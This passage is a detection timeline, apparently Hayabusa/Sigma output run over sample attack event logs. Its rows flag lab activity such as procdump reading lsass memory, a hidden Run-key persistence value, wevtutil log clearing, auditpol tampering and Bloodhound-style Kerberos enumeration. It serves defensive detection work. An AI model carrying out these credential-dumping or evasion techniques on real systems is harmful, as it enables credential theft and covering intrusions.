""C:\Windows\system32\cmd.exe"" | LID: 0xf3072 | PID: 6860 | PGUID: 6661D424-F4F6-5EFE-0000-0010E7EFF800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 09:05:58.278 +00:00,win10.ecorp.com,1,low,Evas,Proxy Execution Via Explorer.exe,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_explorer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 09:05:58.278 +00:00,win10.ecorp.com,1,medium,Evas,Explorer Root Flag Process Tree Break,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_explorer_break_proctree.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 09:05:58.367 +00:00,win10.ecorp.com,1,info,,Process Created,"Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | Process: C:\Windows\explorer.exe | User: ECORP\Administrator | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0xf3072 | PID: 3612 | PGUID: 6661D424-F4F6-5EFE-0000-0010A2F6F800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 09:05:58.583 +00:00,win10.ecorp.com,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: ECORP\Administrator | Parent Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | LID: 0xf3072 | PID: 3224 | PGUID: 6661D424-F4F6-5EFE-0000-0010C00AF900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 09:05:58.739 +00:00,win10.ecorp.com,1,info,,Process Created,"Cmd: ""C:\Windows\System32\win32calc.exe"" | Process: C:\Windows\System32\win32calc.exe | User: ECORP\Administrator | Parent Cmd: ""C:\Windows\System32\calc.exe"" | LID: 0xf3072 | PID: 2632 | PGUID: 6661D424-F4F6-5EFE-0000-00101D25F900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-04 14:18:58.268 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - Hidden Run value detected | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\: ""c:\windows\tasks\taskhost.exe"" | Process: C:\Users\Public\tools\evasion\a.exe | PID: 3728 | PGUID: 747F3D96-8FD2-5F00-0000-0010C15D2200",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/evasion_persis_hidden_run_keyvalue_sysmon_13.evtx +2020-07-04 14:18:58.268 +00:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/evasion_persis_hidden_run_keyvalue_sysmon_13.evtx +2020-07-04 14:31:26.838 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - Pending GPO | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs\Count: DWORD (0x00000001) | Process: C:\Windows\regedit.exe | PID: 1452 | PGUID: 747F3D96-92BB-5F00-0000-0010C1A73100,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_pendingGPO_sysmon_13.evtx +2020-07-04 14:31:26.849 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - Pending GPO | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs\Section1: DefaultInstall | Process: C:\Windows\regedit.exe | PID: 1452 | PGUID: 747F3D96-92BB-5F00-0000-0010C1A73100,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_pendingGPO_sysmon_13.evtx +2020-07-04 14:31:26.856 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - Pending GPO | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs\Path1: c:\programdata\gpo.inf | Process: C:\Windows\regedit.exe | PID: 1452 | PGUID: 747F3D96-92BB-5F00-0000-0010C1A73100,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_pendingGPO_sysmon_13.evtx +2020-07-07 21:51:39.204 +00:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\Public\tools\SysinternalsSuite\procdump.exe | Tgt Process: C:\windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 30256 | Src PGUID: 00247C92-EE6B-5F04-0000-00108C67A859 | Tgt PID: 908 | Tgt PGUID: 00247C92-DC62-5EEF-0000-001026F60100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-07 21:51:39.204 +00:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/proc_access_win_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-07 21:51:39.204 +00:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-07 21:51:39.256 +00:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\Public\tools\SysinternalsSuite\procdump64.exe | Tgt Process: C:\windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 28528 | Src PGUID: 00247C92-EE6B-5F04-0000-00109069A859 | Tgt PID: 908 | Tgt PGUID: 00247C92-DC62-5EEF-0000-001026F60100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-07 21:51:39.256 +00:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/proc_access_win_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-07 21:51:39.256 +00:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-07 21:51:39.262 +00:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\Public\tools\SysinternalsSuite\procdump64.exe | Tgt Process: C:\windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 28528 | Src PGUID: 00247C92-EE6B-5F04-0000-00109069A859 | Tgt PID: 30096 | Tgt PGUID: 00247C92-EE6B-5F04-0000-00105C6CA859,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-07 21:51:39.262 +00:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/proc_access_win_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-07 21:51:39.262 +00:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-09 19:07:25.659 +00:00,fs02.offsec.lan,4688,high,Evas,Suspicious Eventlog Clear or Configuration Using Wevtutil,,rules/sigma/process_creation_builtin/proc_creation_win_susp_eventlog_clear.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (native).evtx +2020-07-09 19:07:25.706 +00:00,fs02.offsec.lan,4688,high,Evas,Suspicious Eventlog Clear or Configuration Using Wevtutil,,rules/sigma/process_creation_builtin/proc_creation_win_susp_eventlog_clear.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (native).evtx +2020-07-09 19:07:25.737 +00:00,fs02.offsec.lan,4688,high,Evas,Suspicious Eventlog Clear or Configuration Using Wevtutil,,rules/sigma/process_creation_builtin/proc_creation_win_susp_eventlog_clear.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (native).evtx +2020-07-09 19:07:25.784 +00:00,fs02.offsec.lan,4688,high,Evas,Suspicious Eventlog Clear or Configuration Using Wevtutil,,rules/sigma/process_creation_builtin/proc_creation_win_susp_eventlog_clear.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (native).evtx +2020-07-09 19:07:25.831 +00:00,fs02.offsec.lan,4688,high,Evas,Suspicious Eventlog Clear or Configuration Using Wevtutil,,rules/sigma/process_creation_builtin/proc_creation_win_susp_eventlog_clear.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (native).evtx +2020-07-09 19:07:25.862 +00:00,fs02.offsec.lan,4688,high,Evas,Suspicious Eventlog Clear or Configuration Using Wevtutil,,rules/sigma/process_creation_builtin/proc_creation_win_susp_eventlog_clear.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (native).evtx +2020-07-09 19:07:25.909 +00:00,fs02.offsec.lan,4688,high,Evas,Suspicious Eventlog Clear or Configuration Using Wevtutil,,rules/sigma/process_creation_builtin/proc_creation_win_susp_eventlog_clear.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (native).evtx +2020-07-09 19:07:25.940 +00:00,fs02.offsec.lan,4688,high,Evas,Suspicious Eventlog Clear or Configuration Using Wevtutil,,rules/sigma/process_creation_builtin/proc_creation_win_susp_eventlog_clear.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (native).evtx +2020-07-09 19:07:25.971 +00:00,fs02.offsec.lan,4688,high,Evas,Suspicious Eventlog Clear or Configuration Using Wevtutil,,rules/sigma/process_creation_builtin/proc_creation_win_susp_eventlog_clear.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (native).evtx +2020-07-09 19:07:26.002 +00:00,fs02.offsec.lan,4688,high,Evas,Suspicious Eventlog Clear or Configuration Using Wevtutil,,rules/sigma/process_creation_builtin/proc_creation_win_susp_eventlog_clear.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (native).evtx +2020-07-09 19:07:26.034 +00:00,fs02.offsec.lan,4688,high,Evas,Suspicious Eventlog Clear or Configuration Using Wevtutil,,rules/sigma/process_creation_builtin/proc_creation_win_susp_eventlog_clear.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (native).evtx +2020-07-09 19:07:26.065 +00:00,fs02.offsec.lan,4688,high,Evas,Suspicious Eventlog Clear or Configuration Using Wevtutil,,rules/sigma/process_creation_builtin/proc_creation_win_susp_eventlog_clear.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (native).evtx +2020-07-09 19:07:26.112 +00:00,fs02.offsec.lan,4688,high,Evas,Suspicious Eventlog Clear or Configuration Using Wevtutil,,rules/sigma/process_creation_builtin/proc_creation_win_susp_eventlog_clear.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (native).evtx +2020-07-09 19:07:26.143 +00:00,fs02.offsec.lan,4688,high,Evas,Suspicious Eventlog Clear or Configuration Using Wevtutil,,rules/sigma/process_creation_builtin/proc_creation_win_susp_eventlog_clear.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (native).evtx +2020-07-09 20:08:00.463 +00:00,fs02.offsec.lan,4688,high,Evas,Suspicious Auditpol Usage,,rules/sigma/process_creation_builtin/proc_creation_win_sus_auditpol_usage.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4688-Audit policy deactivation attempt.evtx +2020-07-09 20:09:33.789 +00:00,fs02.offsec.lan,4688,high,Evas,Suspicious Auditpol Usage,,rules/sigma/process_creation_builtin/proc_creation_win_sus_auditpol_usage.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4688-Audit policy clear attempt.evtx +2020-07-09 20:41:04.488 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ATACORE01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:04.490 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: PKI01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:04.496 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: EXCHANGE01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:04.497 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: WEC01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:04.501 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: FS02$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:04.505 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: WSUS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:04.534 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: DHCP01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:04.576 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ATANIDS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:04.861 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: PRTG-MON$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:04.862 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: MSSQL01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:04.863 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: FS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:04.864 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ADFS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:04.865 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: WEBIIS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:04.885 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:04.887 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: FS03VULN$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:04.887 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:04.912 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:04.939 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:04.949 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:04.950 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:04.951 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:05.016 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:58.983 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:59.810 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:57:38.917 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5bad,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-09 20:57:40.334 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5bf1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-09 20:57:40.365 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5c04,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-09 20:57:40.430 +00:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-09 20:57:40.430 +00:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-09 20:57:40.714 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5c7f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-09 20:57:40.723 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5cb1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-09 20:57:40.725 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5cc8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-09 20:57:40.728 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 